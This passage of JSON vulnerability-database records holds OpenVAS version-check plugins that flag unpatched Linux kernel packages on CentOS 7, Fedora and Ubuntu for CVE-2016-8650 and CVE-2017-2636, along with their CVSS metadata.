isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:47:28", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RWIU4ARKK5YORVMOOVM6HQQ5B5MLATLY", "2016-a820774fc2"], "pluginID": "1361412562310871917", "description": "Check the version of kernel", "edition": 4, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-12-07T00:00:00", "title": "Fedora Update for kernel FEDORA-2016-a820774fc2", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310871917", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871917", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-a820774fc2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871917\");\n script_version(\"$Revision: 6631 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:36:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:20:19 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-8650\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-a820774fc2\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel meta package\n\");\n script_tag(name: \"affected\", value: \"kernel on Fedora 23\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2016-a820774fc2\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RWIU4ARKK5YORVMOOVM6HQQ5B5MLATLY\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.11~100.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:48:38", "references": ["2016-6afdd2b61d", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZOLWEGV7ZS3IJY7M2PSXKXLMCXIGQZ6"], "pluginID": "1361412562310872042", "description": "Check the version of kernel", "edition": 4, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-12-07T00:00:00", "title": "Fedora Update for kernel FEDORA-2016-6afdd2b61d", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310872042", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872042", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-6afdd2b61d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872042\");\n script_version(\"$Revision: 6631 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:36:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:25:28 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-8650\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-6afdd2b61d\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\n of detect NVT and check if the version is vulnerable or not.\");\n\n script_tag(name: \"insight\", value: \"The kernel meta package\");\n\n script_tag(name: \"affected\", value: \"kernel on Fedora 25\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2016-6afdd2b61d\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZOLWEGV7ZS3IJY7M2PSXKXLMCXIGQZ6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.11~300.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:45:45", "references": ["2016-b18410c59c", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4T4T7ZJBLAX7BJ5ZR7WQ2O3EERAQID3"], "pluginID": "1361412562310872076", "description": "Check the version of kernel", "edition": 4, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-12-07T00:00:00", "title": "Fedora Update for kernel FEDORA-2016-b18410c59c", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8650"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310872076", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872076", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-b18410c59c\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872076\");\n script_version(\"$Revision: 6631 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:36:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:26:48 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-8650\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-b18410c59c\");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel meta package\n\");\n script_tag(name: \"affected\", value: \"kernel on Fedora 24\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2016-b18410c59c\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4T4T7ZJBLAX7BJ5ZR7WQ2O3EERAQID3\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.11~200.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T12:57:56", "references": ["3219-1", "http://www.ubuntu.com/usn/usn-3219-1/"], "pluginID": "1361412562310843082", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-03-08T00:00:00", "title": "Ubuntu Update for linux USN-3219-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2636"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310843082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843082", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3219-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843082\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 05:53:42 +0100 (Wed, 08 Mar 2017)\");\n script_cve_id(\"CVE-2017-2636\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3219-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Alexander Popov discovered that the N_HDLC\n line discipline implementation in the Linux kernel contained a double-free\n vulnerability. A local attacker could use this to cause a denial of service\n (system crash) or possibly gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3219-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3219-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-112-generic\", ver:\"3.13.0-112.159\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-112-generic-lpae\", ver:\"3.13.0-112.159\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-112-lowlatency\", ver:\"3.13.0-112.159\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-112-powerpc-e500\", ver:\"3.13.0-112.159\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-112-powerpc-e500mc\", ver:\"3.13.0-112.159\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-112-powerpc-smp\", ver:\"3.13.0-112.159\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-112-powerpc64-emb\", ver:\"3.13.0-112.159\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-112-powerpc64-smp\", ver:\"3.13.0-112.159\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.112.120\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.112.120\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.112.120\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.112.120\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.112.120\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.112.120\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.112.120\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.112.120\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T12:57:12", "references": ["http://www.ubuntu.com/usn/usn-3221-1/", "3221-1"], "pluginID": "1361412562310843076", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-03-08T00:00:00", "title": "Ubuntu Update for linux USN-3221-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2636"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310843076", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843076", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3221-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843076\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 05:53:15 +0100 (Wed, 08 Mar 2017)\");\n script_cve_id(\"CVE-2017-2636\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3221-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Alexander Popov discovered that the N_HDLC\n line discipline implementation in the Linux kernel contained a double-free\n vulnerability. A local attacker could use this to cause a denial of service\n (system crash) or possibly gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3221-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3221-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-1028-raspi2\", ver:\"4.8.0-1028.31\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-41-generic\", ver:\"4.8.0-41.44\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-41-generic-lpae\", ver:\"4.8.0-41.44\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-41-lowlatency\", ver:\"4.8.0-41.44\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-41-powerpc-e500mc\", ver:\"4.8.0-41.44\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-41-powerpc-smp\", ver:\"4.8.0-41.44\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-41-powerpc64-emb\", ver:\"4.8.0-41.44\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.8.0.41.52\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.8.0.41.52\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.8.0.41.52\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.8.0.41.52\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.8.0.41.52\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.8.0.41.52\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.8.0.1028.31\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T12:57:58", "references": ["3220-3", "http://www.ubuntu.com/usn/usn-3220-3/"], "pluginID": "1361412562310843083", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-03-09T00:00:00", "title": "Ubuntu Update for linux-aws USN-3220-3", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2636"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310843083", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843083", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-aws USN-3220-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843083\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-09 05:01:39 +0100 (Thu, 09 Mar 2017)\");\n script_cve_id(\"CVE-2017-2636\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3220-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3220-1 fixed a vulnerability in the\n Linux kernel. This update provides the corresponding updates for the Linux\n kernel for Amazon Web Services (AWS). Alexander Popov discovered that the 